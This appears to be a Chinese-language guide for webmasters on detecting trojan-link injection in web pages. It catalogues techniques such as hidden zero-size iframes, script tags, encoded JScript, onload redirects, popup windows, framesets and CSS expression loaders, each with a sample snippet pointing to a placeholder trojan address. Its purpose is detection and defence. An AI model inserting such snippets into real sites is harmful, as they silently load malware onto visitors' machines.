网页挂马调查报告.docVIP

网页挂马调查报告 网页被挂马是最让站长头痛的一件事情，因为这说明已经有骇客拥有了你的网站的操作权限，面对这种情况，首先如果是虚拟主机用户应当积极与服务商联系运行查杀工具，彻底清除恶意代码和后门；而如果你拥有自己的主机，则应当积极检查程序是否有漏洞并立即升级到最新的补丁。所以作为站长就应当最早的发现网页被挂马的代码，下面是一些比较常见的挂马方式： 常见挂马方式 (一)Iframe框架挂马 这种挂马方式比较多，主要是以下这种格式：“iframe src=木马地址 width=0 height=0/iframe”，width=0和height=0是为了隐藏框架。 (二)Script挂马 与Iframe挂马平级，也比较常见，主要是以下这种格式：script src=木马地址/script，当然也可以演变为Iframe挂马，scriptdocument.write(iframe src=木马地址 width=0 height=0/iframe)/script。 附上一张石头博客被Script挂马的截图 （三）js文件挂马 只要是JS文件，都可以通过被恶意修改从而被挂上恶意代码，一般被全站引用的JS代码最容易被挂木马，检测我们可以查看JS代码的左边或下边，坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏，所以要多看看JS代码页面有没有被故意拉长等。 (四)Js加密变相挂马 这种挂马方式与Script挂马差不多，惟一不同的就是使用了Encode隐藏了源JS的后缀，但同样可以达到执行代码的目的，主要是以下这种格式：“script language=JScript.Encode src=/a.txt/script”虽然表面上看只是引用了一个txt文件，但是依然可以顺利执行其中的代码。 （五）body挂马 body onload=window.location=地址;/body (六)隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + \r\niframe src=/muma.htm//iframe; (七)JAJA挂马 SCRIPT language=javascript window.open (地址,,toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1); /script (八)图片伪装 htmliframe src=网马地址 height=0 width=0/iframeimg src=图片地址/center/html （九）伪装调用 frameset rows=444,0 cols=*frame src=打开网页 framborder=no scrolling=auto noresize marginwidth=0margingheight=0frame src=网马地址 frameborder=no scrolling=no noresize marginwidth=0margingheight=0/frameset （十）高级欺骗 a href=(迷惑连接地址，显示这个地址指向木马地址) onMouseOver=www_163_com(); return true; 页面要显示的内容 /aSCRIPT Language=JavaScriptfunction www_163_com (){var url=网马地址;open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10);}/SCRIPT （十一）Css挂马 Css挂马主要是在Css文件中引用外部Js文件来实现。主要是以下这种格式： body {background: url(javascript:document.write(script src=木马地址;/script))} 或者引用Css中的expression来实现执行Js的方式，比如： a {start:expression(document.write(script src=木马地址/script))} (五)高级欺骗挂马 这种挂马方式与一般不同的在于它会用正规的网站来迷惑用户，在一次正常点击的同时，也达到执行木马代码的目的。以下是一个比较简单的例子